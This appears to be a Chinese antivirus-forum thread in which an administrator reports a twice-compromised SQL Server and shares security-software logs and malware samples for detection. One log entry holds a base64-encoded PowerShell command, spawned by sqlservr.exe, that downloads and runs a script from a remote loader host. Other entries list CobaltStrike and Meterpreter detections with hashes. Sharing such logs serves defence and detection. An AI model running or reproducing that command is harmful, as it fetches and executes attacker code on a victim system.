查看: 2770|回复: 60
收起左侧

[病毒样本] 数据库服务器病毒 8X

  [复制链接]
LovelyTim
发表于 2022-6-7 10:17:52 | 显示全部楼层 |阅读模式
本帖最后由 LovelyTim 于 2022-6-7 10:26 编辑

公司托管在华为云的服务器中了两次一样的毒,
两次火绒都提示已拦截或阻止
但数据库还是被改密码和增加用户了,
怕被拖库(虽然很大可能已经被拖了),准备换KES试试看。
密码 infected







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
LovelyTim
 楼主| 发表于 2022-6-7 11:14:23 | 显示全部楼层
本帖最后由 LovelyTim 于 2022-6-7 11:17 编辑
火绒工程师 发表于 2022-6-7 10:59
收到,我们确认下哈

顺便把日志文件也放上来
因为是两次一样的病毒
就只放最新记录
  1. 【2】2022-06-06 16:00:15,系统防护,应用加固,sqlservr.exe触犯应用加固规则, 已阻止

  2. 防护项目:数据库
  3. 操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  4. 操作目标参数:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe/c  -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBzAHMAcQBsAC4AbABvAGEAZABlAHIAMAAxADEAOAAuAHgAeQB6ADoAMQA0ADMAMwAvAG0AcwBzAHEAbAA3AC4AdAB4AHQAJwApADsA
  5. 操作结果:已阻止

  6. 保护进程路径:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  7. 保护进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  8. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  9. 【3】2022-06-06 15:59:28,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理

  10. 病毒名称:Backdoor/CobaltStrike.l
  11. 病毒ID:976F2654168CFB4F
  12. 病毒路径:C:\Windows\Temp\TmpA0C0.tmp
  13. 操作类型:修改
  14. 操作结果:已处理

  15. 进程ID:1760
  16. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  17. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  18. 父进程:C:\Windows\System32\services.exe
  19. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  20. 【4】2022-06-06 15:59:07,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理

  21. 病毒名称:Backdoor/CobaltStrike.l
  22. 病毒ID:976F2654168CFB4F
  23. 病毒路径:C:\Windows\Temp\Tmp5157.tmp
  24. 操作类型:修改
  25. 操作结果:已处理

  26. 进程ID:1760
  27. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  28. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  29. 父进程:C:\Windows\System32\services.exe
  30. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  31. 【5】2022-06-06 15:58:50,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理

  32. 病毒名称:Backdoor/Meterpreter.ak
  33. 病毒ID:A00D08EFDA1AA78C
  34. 病毒路径:C:\Windows\Temp\TmpD48.tmp
  35. 操作类型:修改
  36. 操作结果:已处理

  37. 进程ID:1760
  38. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  39. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  40. 父进程:C:\Windows\System32\services.exe
  41. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  42. 【6】2022-06-06 15:58:46,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理

  43. 病毒名称:Backdoor/Meterpreter.ak
  44. 病毒ID:A00D08EFDA1AA78C
  45. 病毒路径:C:\Windows\Temp\TmpFB07.tmp
  46. 操作类型:修改
  47. 操作结果:已处理

  48. 进程ID:1760
  49. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  50. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  51. 父进程:C:\Windows\System32\services.exe
  52. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
复制代码

开开心心卖手机
发表于 2022-6-7 10:22:37 | 显示全部楼层
SEP kill all

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
LovelyTim
 楼主| 发表于 2022-6-7 10:24:26 | 显示全部楼层

火绒也提示处理了,但数据库密码和用户还是被改了
Shake2333
发表于 2022-6-7 10:25:21 | 显示全部楼层
本帖最后由 Shake2333 于 2022-6-7 10:27 编辑

panda kill all

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kuroandsan
发表于 2022-6-7 10:26:05 | 显示全部楼层
Avira all


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
开开心心卖手机
发表于 2022-6-7 10:26:12 | 显示全部楼层
LovelyTim 发表于 2022-6-7 10:24
火绒也提示处理了,但数据库密码和用户还是被改了

尴尬,建议换个重武器上去
红豆有绿豆
头像被屏蔽
发表于 2022-6-7 10:27:02 | 显示全部楼层
卡巴kill all

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
LovelyTim
 楼主| 发表于 2022-6-7 10:28:00 | 显示全部楼层
开开心心卖手机 发表于 2022-6-7 10:26
尴尬,建议换个重武器上去

午休再装,现在社畜中

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
开开心心卖手机 + 1 辛苦了

查看全部评分

aboringman
发表于 2022-6-7 10:28:50 | 显示全部楼层
  1. 2022-06-07 10:27:48     感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmpd48.tmp
  2. 2022-06-07 10:27:48     感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmpfb07.tmp
  3. 2022-06-07 10:27:47     感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmp42a2.tmp
  4. 2022-06-07 10:27:47     感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmp5157.tmp
  5. 2022-06-07 10:27:47     感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmp55ae.tmp
  6. 2022-06-07 10:27:47     感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmpa0c0.tmp
  7. 2022-06-07 10:27:47     感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmpb9d8.tmp
  8. 2022-06-07 10:27:47     感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器x下载\infected\tmpc3f.tmp
复制代码
LovelyTim
 楼主| 发表于 2022-6-7 10:30:05 | 显示全部楼层
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-9-25 15:19 , Processed in 0.145196 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表